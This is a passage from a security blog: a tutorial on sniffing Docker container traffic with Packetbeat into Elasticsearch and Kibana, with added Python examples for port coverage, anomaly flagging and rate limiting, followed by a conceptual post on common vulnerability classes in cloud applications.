<span style="font-family: Courier New;"># docker --version<br />
Docker version 1.7.1, build df2f73d-dirty<br />
</span><br />
After ensuring the Docker is installed, we can install Packetbeat, which requires only <strong>libpcap</strong>,
a system-independent library for network traffic capture, enabling us
to capture packets as they arrive on a network interface.<br />
We can install Packetbeat fairly easily by pulling the Docker image from the official Docker Hub.<br />
<span style="font-family: Courier New;"># docker pull proteansec/packetbeat<br />
</span><br />
Then we have to create the packetbeat.yml configuration file, which
must include the following categories, each containing specific
information to configure Packetbeat:<strong><br />
</strong><br />
<ul>
<li><strong>Interfaces</strong>: This specifies the interface on which we would like to capture the traffic. We can use <strong>any</strong> to specify that we would like to capture traffic on all connected interfaces.<strong><br />
</strong></li>
<li><strong>Protocols</strong>: We can monitor only a limited number of
protocols for now, including DNS, HTTP, Memcache, Mysql, Postgresql,
Redis, Thrift, and MongoDB. For each protocol, we must specify on which
port the application using it is running.<strong><br />
</strong></li>
<li><strong>Output</strong>: specifies where the analyzed traffic
information will be stored, which currently supports Elasticsearch,
LogStash and in a File. In most cases, we want to use the Elasticsearch
output because it allows us to easily search through the analyzed data
as well as present it in a nice-looking graph with Kibana.</li>
</ul>
A complete packetbeat.yml configuration file can be seen below, where
we’ve made the assumption that Elasticsearch is accessible on the local
host on port 9200. You can save packetbeat.yml anywhere on the
filesystem, but it’s advisable that you create the /etc/packetbeat/
directory and put the configuration file in there; this is already being
done by the container itself.<br />
<pre style="font-family: Courier New;">interfaces:
  device: docker0
protocols:
  dns:
    ports: [53]
    include_authorities: true
    include_additionals: true
  http:
    ports: [80, 8080, 8000, 5000, 8002]
  memcache:
    ports: [11211]
  mysql:
    ports: [3306]
  pgsql:
    ports: [5432]
  redis:
    ports: [6379]
  thrift:
    ports: [9090]
  mongodb:
    ports: [27017]
output:
  elasticsearch:
    enabled: true
    hosts: ["localhost:9200"]
shipper:
  geoip:
    paths: ["/usr/local/share/GeoIP/GeoIP.dat.gz"]</pre>
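Packetbeat only decodes traffic on the ports listed under each protocol, so a container listening on an unlisted port is simply invisible in Kibana. The Python script below is an added example (not code from the article or from the Packetbeat project): it cross-checks the packetbeat.yml above against constructed <span style="font-family: Courier New;">docker ps</span> output and reports container ports that no protocol covers. The YAML parse is a minimal line-oriented one written for this file's layout, not a general YAML parser.<br />

```python
import re

# The packetbeat.yml from the article, embedded so the check runs offline.
PACKETBEAT_YML = """\
interfaces:
  device: docker0
protocols:
  dns:
    ports: [53]
    include_authorities: true
    include_additionals: true
  http:
    ports: [80, 8080, 8000, 5000, 8002]
  memcache:
    ports: [11211]
  mysql:
    ports: [3306]
  pgsql:
    ports: [5432]
  redis:
    ports: [6379]
  thrift:
    ports: [9090]
  mongodb:
    ports: [27017]
output:
  elasticsearch:
    enabled: true
    hosts: ["localhost:9200"]
"""

# Constructed sample of `docker ps --format '{{.Names}}\t{{.Ports}}'` output.
# "web" matches the article's nginx container (-p 80:80); "api" and "db" are
# made up to show the gap the check is meant to find.
DOCKER_PS = """\
web\t0.0.0.0:80->80/tcp
api\t0.0.0.0:8443->443/tcp
db\t5432/tcp
"""

PROTOCOL_LINE = re.compile(r"^  (\w+):\s*$")
PORTS_LINE = re.compile(r"^    ports:\s*\[([^\]]*)\]")
# The container-side port is what Packetbeat sees on docker0: the host's DNAT has
# already rewritten the destination before the packet is forwarded onto the bridge,
# so a "8443->443/tcp" mapping shows up on docker0 as port 443.
PORT_MAPPING = re.compile(r"(?:\S+:)?(?:\d+->)?(\d+)/(tcp|udp)")


def monitored_ports(yml_text):
    """Return {port: protocol} for every port listed under protocols.* in packetbeat.yml."""
    ports = {}
    in_protocols = False
    current = None
    for line in yml_text.splitlines():
        if not line.startswith(" "):
            # Top-level key: remember whether we are inside the protocols: section.
            in_protocols = line.rstrip() == "protocols:"
            current = None
            continue
        if not in_protocols:
            continue
        m = PROTOCOL_LINE.match(line)
        if m:
            current = m.group(1)
            continue
        m = PORTS_LINE.match(line)
        if m and current:
            for p in m.group(1).split(","):
                p = p.strip()
                if p:
                    ports[int(p)] = current
    return ports


def container_ports(docker_ps_text):
    """Return [(container, container_port, proto)] for each port in `docker ps` output."""
    result = []
    for line in docker_ps_text.splitlines():
        if not line.strip():
            continue
        name, _, port_spec = line.partition("\t")
        for m in PORT_MAPPING.finditer(port_spec):
            result.append((name, int(m.group(1)), m.group(2)))
    return result


def coverage_report(yml_text, docker_ps_text):
    """Map (container, port) to the Packetbeat protocol decoding it, or None if unmonitored."""
    monitored = monitored_ports(yml_text)
    return {(name, port): monitored.get(port)
            for name, port, _proto in container_ports(docker_ps_text)}


if __name__ == "__main__":
    for (name, port), proto in sorted(coverage_report(PACKETBEAT_YML, DOCKER_PS).items()):
        print(f"{name}:{port} -> {proto or 'NOT MONITORED by Packetbeat'}")
```

In the constructed sample, the api container's port 443 is reported as unmonitored, since no protocol in the configuration lists it.<br />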
Afterwards we can start the container with the following command,
which starts the Packetbeat container and gives it access to the host's network
interfaces, services, etc. Below we've started the container and then
used the <strong>docker exec</strong> command to obtain command-line access to the running container, after which we verify that the host's Elasticsearch port 9200
is actually reachable from inside the container.<br />
<span style="font-family: Courier New;"># docker run -d --net=host proteansec/packetbeat<br />
# docker exec -it $(docker ps -l -q) /bin/bash<br />
root@container:/# sudo -i<br />
root@container:/# netstat -luntp<br />
Active Internet connections (only servers)<br />
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name<br />
tcp6 0 0 :::9200 :::* LISTEN -<br />
</span><br />
To build Packetbeat manually, we can use the following <a href="https://github.com/proteansec/packetbeat">Dockerfile</a>,
which provides many configuration parameters that let us change
how Packetbeat runs inside the container. The Packetbeat
container can then be up and running with the one simple command shown below.
Note that Packetbeat is configured through the input
parameters we supply when running docker; additionally, the GeoIP
database is downloaded and the Kibana dashboards are automatically
downloaded and applied to Kibana, so we can instantly view the graphs
and analyze the traffic without much further ado.<br />
<span style="font-family: Courier New;"># docker run --name packetbeat -d --net=host proteansec/packetbeat app:start<br />
</span><br />
Note that the Packetbeat container needs access to the host network, so
we need to apply the "--net=host" option when running the container,
which gives the container access to the interfaces on the host, thus
making it possible to sniff the traffic coming to and going from every
dockerized application running on the same host.<br />
<h1>
Topbeat</h1>
Besides Packetbeat, there is also Topbeat, which, rather than
analyzing the traffic coming and going to dockerized applications,
collects and presents statistics about the other parts of the
environment, mainly CPU, memory and disk usage:<br />
<ul>
<li>System load</li>
<li>Disk usage</li>
<li>Process status</li>
<li>Memory usage</li>
<li>CPU usage</li>
</ul>
We can get Topbeat by running the following command, which will
download the already built image from Dockerhub, but you can also
download the <a href="https://github.com/proteansec/topbeat">Dockerfile</a> manually and build the image yourselves.<br />
<span style="font-family: Courier New;"># docker run --name topbeat -d --privileged proteansec/topbeat app:start<br />
</span><br />
Note that Topbeat needs to run in privileged mode, because it
needs to be able to access system information from inside a container, which is
only possible when the container itself is run with enough privileges.<br />
After the Topbeat container has been run, we can access the Kibana
interface, which will contain a new Topbeat index pattern as presented
below:<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI1.png" /></div>
Back in the Discover tab, we can see the Topbeat entries, as shown below.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI2.png" /></div>
A nicer presentation of gathered data is available through the Topbeat dashboard, which can be seen below.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI3.png" /></div>
<h1>
The Docker0 Network Interface</h1>
In the previous section, we specified the <strong>docker0</strong>
network interface in the interfaces section of the packetbeat.yml
configuration file. Note that, at the time of this writing, we can only
choose a single interface per Packetbeat instance, so if we would
like to monitor multiple network interfaces at the same time, we have to
start additional Packetbeat instances, each of which sniffs network
traffic on a single network interface and sends it to Elasticsearch.
Note that we can specify <strong>any</strong> as the network interface,
which will sniff the traffic on all interfaces, but that is often not
what we want to achieve; also, it is currently not supported on all
operating systems, so it doesn't work on <a href="https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-getting-started.html">OS X</a>, for example.<br />
Nevertheless, we can specify <strong>docker0</strong> network interface, which will allow us to sniff the network traffic from all container <strong>veth*</strong>
network interfaces, which is exactly what we want to achieve. It’s
often the case that we want to sniff the network traffic of every
running container in order to analyze the traffic going to services
running in the containers.<br />
When Docker starts, it creates a virtual interface <strong>docker0</strong>
and assigns it a private random IP address range, which is often set to
172.17.42/16 if available. Note the netmask is 16-bit, which means
there are 65534 available IP addresses that can be assigned to any
running containers [1].<br />
The docker0 interface is a network bridge, which itself contains the other
veth* network interfaces of running Docker containers. Because of this,
the containers can communicate with the host as well as with each other,
so that one service can talk to another running in a different
container. Note that all interfaces belonging to the same bridge are in
the same collision domain, so when one interface broadcasts a request,
it is sent over the bridge to every other network interface, any of
which may respond.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI4.png" /></div>
When Docker configures another container, it creates a new virtual interface with a unique name <strong>veth*</strong>, which is bound to the docker0 network interface on the host. Inside the Docker container, the interface is renamed to <strong>eth0</strong>
and given a unique IP address from the bridge's range of
available network addresses. Below we'll see that we need to give the
Packetbeat Docker container the --net option, which accepts the
following values:<br />
<ul>
<li><strong>none</strong>: The docker container will have its own
unconfigured network stack, which allows us to build our own network
inside the container.<strong><br />
</strong></li>
<li><strong>container:name/id: </strong>The docker container will share
the network stack with another container identified with NAME/ID, where
the containers will be able to talk to each other though loopback
interface.<strong><br />
</strong></li>
<li><strong>bridge</strong>: This option is the default and connects the container interface to the Docker bridge as already described.<strong><br />
</strong></li>
<li><strong>host</strong>: The container will share the network stack with the
Docker host and will have access to all its network interfaces. With
this option alone, the container will not be able to reconfigure the
host's interfaces; that would additionally require privileged mode, given to
the container with the "--privileged=true" option.</li>
</ul>
The docker0 interface on the host is used as the default gateway by
which the containers are able to reach the Internet. Therefore, by
configuring Packetbeat to listen on the docker0 network interface, we’re
successfully telling it to sniff every network packet coming from the
Internet to any Docker container, which is exactly what we want to
achieve.<br />
<h1>
Monitoring an HTTP application running in Docker</h1>
Now that we have Packetbeat up and running, we have to provide a
service for Packetbeat to monitor by sniffing traffic from docker0
bridge. In our case we’ll provide a static website, which is a great
example for testing the Packetbeat capabilities.<br />
Let's first create the /home/core/website directory and copy some static
website content into it. After that, we should run the <strong>nginx</strong>
container, mounting the static website content into the Nginx html
directory, which can be done with the -v option. Note that we've also
exposed the container port, so we can access the website running in that
container on HTTP port 80.<br />
<span style="font-family: Courier New;"># docker run -p 80:80 -v /home/core/website:/usr/share/nginx/html:ro -d nginx<br />
</span><br />
Afterwards, we can connect to the Nginx container, where our website is running. We can see that the <a href="https://www.proteansec.com/">Protean Security</a> website is served from the container, as shown in the picture below.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI5.png" /></div>
To get details about the Packetbeat data in Elasticsearch,
we can issue the following command, which returns a pretty-printed view
of the information Packetbeat has gathered so far:<br />
<span style="font-family: Courier New;"># curl -XGET '<a href="http://localhost:9200/packetbeat-*/_search?pretty">http://localhost:9200/packetbeat-*/_search?pretty</a>'<br />
</span><br />
By navigating through the website, all the HTTP queries will be gathered by Packetbeat and stored in Elasticsearch.<br />
<h1>
Viewing Analyzed Data through Kibana Graphs</h1>
The exposed RESTful API interface is great, but fails to provide a
quick and nice-looking way of presenting what is happening in our
network. To solve that, we can use Kibana, where dashboards can be
instantiated in order to see the gathered data quickly and instantly
tell what is happening on our network.<br />
First, we must go to “Settings – Indices,” where new indices will be shown as below.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI6.png" /></div>
Back in the “Discover” tab, we can select the index pattern we would
like to use by selecting it from the drop-down menu. Each data entry
stored in Elasticsearch has an index pattern that identifies the
Elasticsearch indices we would like to explore. To display all indices
defined by Elasticsearch, we can run the following command:<br />
<span style="font-family: Courier New;"># curl 'localhost:9200/_cat/indices?v'<br />
</span><br />
Note that in the Discover tab, we can select the index pattern "packetbeat-*" from the drop-down list to view the gathered data.<br />
<img align="middle" alt="" class="aligncenter" height="278" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI7.png" width="642" /><br />
To install the dashboards from the <a href="https://github.com/elastic/beats-dashboards">beats-dashboards</a> Github repository, we can simply clone the repository and run the “./load.sh <a href="http://localhost:9200/">http://localhost:9200</a>”
command to load the dashboards (this is already done by the docker
images presented in the previous section, so there’s no need to do it
again). Then, back in Kibana, we can go to “Dashboard – Load Saved
Dashboard” to see newly added dashboards, as shown below.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI8.png" /></div>
If we click on the HTTP dashboard, we can see that a new dashboard
will open, which also contains the navigation page, where we can select
different dashboards directly. At this time, there is no data present in
the Kibana interface, as is shown below.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI9.png" /></div>
Now we have to test two use-case scenarios. First we have to visit
the website from outside of the Docker infrastructure, which can be
easily achieved by visiting the website from another machine altogether.
After doing that, we can go to the Kibana interface to see whether
Packetbeat has gathered any HTTP requests in the last couple of
minutes—we can indeed see that there are 10 requests present in the
interface. This verifies that Packetbeat is able to sniff the packets
coming from the Internet to a Docker container.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI10.png" /></div>
We also have to verify that Packetbeat can monitor requests coming
from another Docker container running on the same physical host. Instead
of the external IP address, we'll specify the internal IP address of the
container. Basically, we have to run "docker exec -it ID /bin/bash" and
execute the ifconfig command in the Docker container running Nginx to
discover that container's internal IP address. Then we issue the same
command to gain a command-line interface to some other container running
on the same host and execute the "curl <a href="http://172.17.0.11/">http://172.17.0.11/</a>"
command to download the website's HTML source code. Note that curl does
not parse the returned HTML, so no additional requests for images or
JavaScript/CSS files are made, which means only one request is
generated.<br />
If we set the timer in Kibana web interface to the last number of
minutes (1 minute is good enough) where no requests have been generated,
the counter of requests will again be back to zero. Then we can issue
the curl command, which will generate 1 request as shown below.<br />
If we view the details of a request in the "Discover" tab, the
following information is available (note that only the most useful
fields are shown in the picture below), where we can see that a "GET /"
request was generated from IP address 172.17.0.1 to IP address
172.17.0.11 (where our website is served by the nginx Docker
container). The GET response returned an HTTP status code 200 and
contained 10554 bytes of data.<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI12.png" /></div>
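Once transactions like the one above are stored in Elasticsearch, the same fields can drive simple detection logic. The Python below is an added example, not code from the article or from Elastic: it unwraps the <span style="font-family: Courier New;">hits.hits[]._source</span> documents that the <span style="font-family: Courier New;">_search</span> call shown earlier returns, aggregates HTTP transactions per client IP, and flags clients that produce many error responses or touch many distinct paths. The sample response is constructed; the field names (<span style="font-family: Courier New;">client_ip</span>, <span style="font-family: Courier New;">ip</span>, <span style="font-family: Courier New;">method</span>, <span style="font-family: Courier New;">path</span>, <span style="font-family: Courier New;">bytes_out</span>, <span style="font-family: Courier New;">http.code</span>) follow the Packetbeat 1.x transaction schema as an assumption, with the first document mirroring the request shown above.<br />

```python
from collections import defaultdict


def _http_doc(client_ip, server_ip, method, path, code, bytes_out):
    """Build a document shaped like a Packetbeat 1.x HTTP transaction (assumed field names)."""
    return {"type": "http", "client_ip": client_ip, "ip": server_ip, "port": 80,
            "method": method, "path": path, "bytes_out": bytes_out,
            "http": {"code": code}}


# Constructed stand-in for the JSON returned by
# curl 'http://localhost:9200/packetbeat-*/_search'. The first hit mirrors the
# article's "GET /" from 172.17.0.1 to 172.17.0.11 (200, 10554 bytes); the DNS hit
# and the burst of 404s from 203.0.113.7 (a TEST-NET address) are made up.
SAMPLE_RESPONSE = {
    "hits": {
        "total": 15,
        "hits": [
            {"_index": "packetbeat-2015.12.21", "_type": doc["type"], "_source": doc}
            for doc in [
                _http_doc("172.17.0.1", "172.17.0.11", "GET", "/", 200, 10554),
                _http_doc("172.17.0.1", "172.17.0.11", "GET", "/favicon.ico", 200, 1234),
                {"type": "dns", "client_ip": "172.17.0.11", "ip": "172.17.0.1",
                 "query": "example.com"},
            ] + [_http_doc("203.0.113.7", "172.17.0.11", "GET", f"/old/{i}", 404, 571)
                 for i in range(12)]
        ],
    }
}


def load_hits(search_response):
    """Unwrap the _source documents from an Elasticsearch _search response."""
    return [hit["_source"] for hit in search_response["hits"]["hits"]]


def summarize_clients(docs):
    """Per client_ip: request count, distinct paths, responses with status >= 400,
    and bytes served. Non-HTTP transactions (e.g. DNS) are skipped."""
    stats = defaultdict(lambda: {"requests": 0, "paths": set(), "errors": 0, "bytes_out": 0})
    for doc in docs:
        if doc.get("type") != "http":
            continue
        s = stats[doc["client_ip"]]
        s["requests"] += 1
        s["paths"].add(doc.get("path", ""))
        s["bytes_out"] += doc.get("bytes_out", 0)
        if doc.get("http", {}).get("code", 0) >= 400:
            s["errors"] += 1
    return stats


def flag_anomalies(stats, max_errors=5, max_distinct_paths=10):
    """Return {client_ip: [reasons]} for clients whose traffic looks like probing
    rather than browsing: many error responses, or a wide spread of distinct paths."""
    flagged = {}
    for client_ip, s in stats.items():
        reasons = []
        if s["errors"] >= max_errors:
            reasons.append(f"{s['errors']} responses with status >= 400")
        if len(s["paths"]) >= max_distinct_paths:
            reasons.append(f"{len(s['paths'])} distinct paths")
        if reasons:
            flagged[client_ip] = reasons
    return flagged


if __name__ == "__main__":
    stats = summarize_clients(load_hits(SAMPLE_RESPONSE))
    for client_ip, reasons in flag_anomalies(stats).items():
        print(f"{client_ip}: {'; '.join(reasons)}")
```

With live data, replace <span style="font-family: Courier New;">SAMPLE_RESPONSE</span> with the parsed output of the curl command shown earlier and add a range filter on <span style="font-family: Courier New;">@timestamp</span> to the query so only the last few minutes are scored.<br />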
<h1>
Conclusion</h1>
In this article we’ve seen that we can gather a lot of useful
information about packets flowing to and from our Docker container,
which can be beneficial to discover any anomalies that can be further
analyzed for potential threats.<br />
This exercise proved that we can use Packetbeat for our defense,
because of its capabilities to sniff traffic from Docker containers.
Note that many cloud-based applications are running in Docker
containers, so sniffing the packets to analyze them or possibly pipe
them to an IDS/IPS proves beneficial to discover malicious traffic and
block the attacker as soon as possible.<br />
<h1>
References</h1>
[1] Network configuration, <a href="https://docs.docker.com/articles/networking/">https://docs.docker.com/articles/networking/</a> .<br />
<div style="text-align: center;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/122115_2337_DeepPacketI11.png" /></div>
</div>
Posted by Anonymous (http://www.blogger.com/profile/14161834164641471363).<br />
<h1>
Security Vulnerabilities in Cloud Applications</h1>
Published 2015-12-31T14:09:00.001+05:30, updated 2015-12-31T14:17:17.358+05:30.<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.smartdatacollective.com/sites/smartdatacollective.com/files/cloud-computing_0.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.smartdatacollective.com/sites/smartdatacollective.com/files/cloud-computing_0.jpg" height="333" width="400" /></a></div>
There are a number of cloud-based applications that we use every day
without even thinking about it: the email service, search engines,
websites, even our bank application. While some might not categorize the
security of their cloud application as important, we beg to differ,
since we as users would like to have our personal information secured.
For example, imagine an online fitness application that we can log in to
in order to view our visits to the gym, our subscription details as
well as our personal information like name, surname, and home address.
This all sounds great, but what are the security implications?<br />
Let's assume we're a user of such a cloud-based application, but in
our free time we like to learn about IT security, which gives us enough
knowledge to gain access to the personal information of other users.
Worse still, a malicious attacker might get access to the
backend database, where the application supposedly stores passwords
that are not encrypted but in plaintext. In such circumstances, the
hacker will have access to your password and will be able to log into
the cloud application in your name; not only that, he might be able to
access other websites, where the authentication success will depend upon
the user using the same password for other applications. Let's take a
step back and think about the initial statement that security is not
important for their business; it might not be, but, because of your
application's security vulnerabilities, the personal information (or even
personal identity) of your users might be compromised, which might have
terrifying consequences for your users' lives.<br />
<h1>
Internet of Things (IoT)</h1>
Cloud-based applications normally run in the cloud, but are accessed
by the users via different means. Cloud-based web applications
immediately come to mind, which have been at the forefront for the last
decade or so. They are also understood by most security professionals,
since they have been most widely researched and analyzed in the past.
This is due to the fact that personal computers are widely used by
people worldwide, but the trend is shifting to smaller devices, like
smart phones, smart glasses, smart watches, smart embedded devices, etc.
Basically, a lot of ordinary devices are now becoming smart devices,
which have connectivity to the Internet, thus laying the foundations of
the Internet of Things (IoT).<br />
While many companies are striving to make their devices (whatever
they might be) smart and connect them to the Internet, there are many
security-related issues that we must take into consideration before we
hastily rush into buying every smart device. If we think about it, all
of the smart devices, including the now old-fashioned personal computer,
will sooner or later use at least one cloud-based application once the
connection to the Internet is established. When a web browser is
connecting to a web page, it's actually talking to a server that can
be anywhere in the world. The same is true for mobile applications and
other applications requiring Internet access, regardless of whether they
are running on a personal computer, a mobile device or a smart watch.<br />
If written correctly, cloud-based
applications are programmed once and can be used by corresponding client
application counterparts running on any device. We can connect to a
cloud chat application via a browser extension or from a specifically
written custom mobile application, but the cloud application remains the
same. Therefore, it's self-evident that, since the cloud application is
the same, it must contain the same vulnerabilities, no matter how we
interact with it. This brings us to the conclusion that finding and
exploiting vulnerabilities in cloud-based applications can be done from
any device, either from a personal computer or from a mobile phone or
any other device, for that matter. The only things that change are the tools
and techniques available on the device from which we would like to
interact with the cloud-based application. While there are many tools
available for personal computers, which is only natural, since they have been
with us the longest, we can also search for the same vulnerabilities
from our smart phones, but with a somewhat limited number of tools
available.<br />
It’s also worth mentioning that, leaving aside the protocols,
frameworks, or the programming languages used to run the cloud-based
application, the basic types of vulnerabilities remain the same, even
though they might be named differently. For example, let’s take a look
at session fixation vulnerability: When interacting with our bank
application from a personal computer, we usually require a certificate
and a password, which is given to the web browser, which authenticates
us; the same is true for mobile devices, where the authentication
secrets are taken by a specifically written mobile application to
authenticate us to the bank application. What both approaches have in
common is that if the cloud-based application contains a session
fixation vulnerability, we can preset a specific session token of a
user, where the client application validates it and consequently
authenticates the user. It goes without saying that a session token can
be anything and is dependent upon the type of application, but the
principle behind it remains the same: A user has some kind of a token,
which was validated by the application and can be used by an attacker to
access the cloud-based application in the name of the user.<br />
We might also emphasize that there exist many vulnerabilities
specific to the client that have little to do with the cloud-based
applications. Those vulnerabilities are present only in certain hardware
devices, operating systems, applications, application configurations,
etc. Those kinds of vulnerabilities will not be described here.<br />
<h1>
Types of Vulnerabilities</h1>
Now that we’ve laid the groundwork for the basis of this article, we
can describe the types of vulnerabilities present in cloud-based
applications. We’ve already shown that the basic types of
vulnerabilities remain the same, regardless of the internals of the
cloud-based applications, which is why we can start from OWASP Top 10
[2] and provide basic descriptions of the most prevalent cloud-based
application vulnerabilities.<br />
<ul>
<li><b>Server-side injection:</b> A hacker can inject his own
logic into the application’s backend to get access to sensitive
information. A cloud-based application can store a lot of information
about users, where an attacker might be able to access not only his own
information, but the information of other users as well.</li>
<li><b>Client-side injection:</b> In a server-side injection,
an attacker injects additional instructions to be executed on the
server; in client-side injection he injects the instructions to the
server, but they are replayed back to the client to be executed by the
client application. This is usually because of an XSS vulnerability in a
web application, where a hacker sends a link to the user, who clicks on
the link, after which the additional code is executed in the user’s web
browser.</li>
<li><b>Session management:</b> If a cloud-based application
provides authenticated access to users, the user can log in to the
application via his credentials. It’s up to the application to provide a
secure communication channel (HTTPS) from the client’s application to
the cloud-based application. If applicable and where the utmost security
is desired, a service can also provide certificate-pinning.</li>
<li><b>Exposure of sensitive data:</b> Many cloud-based
applications allow you to save data in the cloud, ranging from less to
more sensitive information. If storing high-priority sensitive
information in the cloud, we have to ensure the data in the cloud is
properly encrypted, which can only be secure if the encryption and
decryption happens on the client side, prior to sending anything to the
cloud.</li>
<li><b>Logical mistakes:</b> Many applications that allow
authenticated access actually provide limited access to data stored in
the cloud. But the application shouldn’t rely only on a user’s session
to give access to the data; it should have proper access controls in
place to check whether the data being accessed actually belongs to that
user. This can often be exploited by authenticating to the application
and changing the ID of the arbitrary element to access the element of
other users, where the element can be a document, an email, personal
information, etc.</li>
<li><b>Vulnerable libraries:</b> Many applications use
third-party libraries and frameworks to set the grounds on which they
build their own application. While there's nothing wrong with that
approach, we have to make sure the libraries are updated and their
functionalities are not exposed to the Internet: only the application
functionality should be accessible.</li>
</ul>
<h1>
Conclusion</h1>
In this article, we’ve explained the concept of a cloud-based
application and how client applications communicate with them to do
something useful. There are many different devices, such as personal
computers, smart phones, smart watches, and any Internet-capable device
that communicates with the cloud-based applications via different means.
While the means of interaction can differ greatly, the vulnerabilities
in cloud-based applications remain the same, but their discovery largely
depends upon the client-side technology used.<br />
When testing a cloud-based application for security vulnerabilities
that can only be interacted with through a smart phone, whether on
Android or iOS, the vulnerabilities in that cloud-based application
are similar. You as a penetration tester or a security consultant have
to keep in mind that the security vulnerabilities in such an application
are not different, they are not harder or even impossible to find, but
they are the same as if the application provided a web-based interface
to interact with its functionalities.<br />
We have to keep that in mind in order to test for security
vulnerabilities of non-typical cloud-based applications. For example, a
cloud-based application providing input fields to invoke certain
functionality, like sending an email to another user, has to have some
kind of verification to prove the user is a human, like a captcha.
Otherwise, a hacker could write a small program to invoke this
functionality over and over and send millions of emails per day. In case
a mail service like <a href="https://www.mailgun.com/">MailGun</a>
is used to send and receive emails through a simple API, the owner of
the cloud-based application will have to pay for all of the emails sent
by the hacker. This could be a critical vulnerability, but it can be
easily prevented with an implementation of a captcha mechanism to prove
to the application that you are indeed a human; this is practically
self-evident when looking at a web application and almost any security
professional will identify it and report it to their customer.<br />
The problem arises with a mobile application, which could implement
the same input fields without the captcha mechanism, because it isn't
customary for a user on a mobile device to fill out captcha forms.
Remember that captchas were also not used back in the early days of the
World Wide Web, but have now become an essential part of many web
applications to enhance security. To make matters worse, many developers
don't even realize that a hacker can intercept any network traffic and
replay it, even outside of the application; and even if a mobile application
signs every request sent to the cloud-based application, a hacker can
still inject himself into the mobile application at runtime and send the
requests from inside the mobile application, which will sign every
request for him. Therefore, a cloud-based application should verify how
many requests have been sent from the same client, regardless of the
type of application being used, and after a number of consecutive
requests, ask the client application, a mobile application in this case,
to display a captcha for the user to fill out.<br />
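One way to implement the server-side counting just described, as an added example with hypothetical names (not code from the article or from any real service): the policy is keyed on the account the server itself authenticated, never on anything the client claims about itself, so a request typed into a browser, sent by the mobile application, or replayed from outside it is counted the same way, and a solved captcha resets the window.<br />

```python
import time
from collections import deque


class SendMailPolicy:
    """Sliding-window request counter with a captcha step-up (hypothetical helper).

    Counting happens per authenticated account on the server, so it does not
    matter whether the client is a browser, the mobile app, or a replay tool."""

    ALLOW = "allow"
    CAPTCHA_REQUIRED = "captcha_required"

    def __init__(self, max_requests=5, window_seconds=60, clock=time.monotonic):
        self.max_requests = max_requests
        self.window = window_seconds
        self.clock = clock
        self._history = {}  # account_id -> deque of request timestamps in the window

    def check(self, account_id, solved_captcha=False):
        """Return ALLOW or CAPTCHA_REQUIRED for one send attempt by account_id."""
        now = self.clock()
        hist = self._history.setdefault(account_id, deque())
        # Drop timestamps that have fallen out of the window.
        while hist and now - hist[0] > self.window:
            hist.popleft()
        if solved_captcha:
            # A freshly solved captcha proves a human is present: start counting again.
            hist.clear()
        if len(hist) >= self.max_requests:
            return self.CAPTCHA_REQUIRED
        hist.append(now)
        return self.ALLOW


def send_email(policy, session, client_type, solved_captcha=False):
    """Server-side handler for the 'send email to another user' feature.

    client_type ('web' or 'mobile') is informational only; the decision is keyed
    on the account the server authenticated, so a request signed by the mobile app
    or replayed outside it is treated exactly like one typed into a browser."""
    account_id = session["account_id"]
    verdict = policy.check(account_id, solved_captcha)
    if verdict == SendMailPolicy.CAPTCHA_REQUIRED:
        # Tell the client (web or mobile) to show a captcha before retrying.
        return {"sent": False, "challenge": "captcha", "client": client_type}
    # The hand-off to the mail provider's API would happen here.
    return {"sent": True, "client": client_type}


class FakeClock:
    """Manually advanced clock so the policy can be exercised deterministically."""

    def __init__(self):
        self.now = 0.0

    def advance(self, seconds):
        self.now += seconds

    def __call__(self):
        return self.now


def demo():
    """Drive the policy through the article's scenario; returns the 'sent' outcomes."""
    clock = FakeClock()
    policy = SendMailPolicy(max_requests=3, window_seconds=60, clock=clock)
    session = {"account_id": "user-42"}  # constructed session for one authenticated account
    outcomes = []
    # Three sends from the web client are within the limit...
    for _ in range(3):
        outcomes.append(send_email(policy, session, "web")["sent"])
    # ...a fourth, arriving from the mobile client (or a replay of its traffic), is challenged.
    outcomes.append(send_email(policy, session, "mobile")["sent"])
    # Solving the captcha resets the window and the send goes through.
    outcomes.append(send_email(policy, session, "mobile", solved_captcha=True)["sent"])
    # Once the window has expired, the counter is empty again.
    clock.advance(61)
    outcomes.append(send_email(policy, session, "web")["sent"])
    return outcomes  # [True, True, True, False, True, True]


if __name__ == "__main__":
    print(demo())
```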
We have to keep in mind that a hacker can control any client-side
application, regardless of whether it is running in his web browser
in the form of a web application or as a mobile application. The
vulnerabilities in cloud-based applications are the same and can be
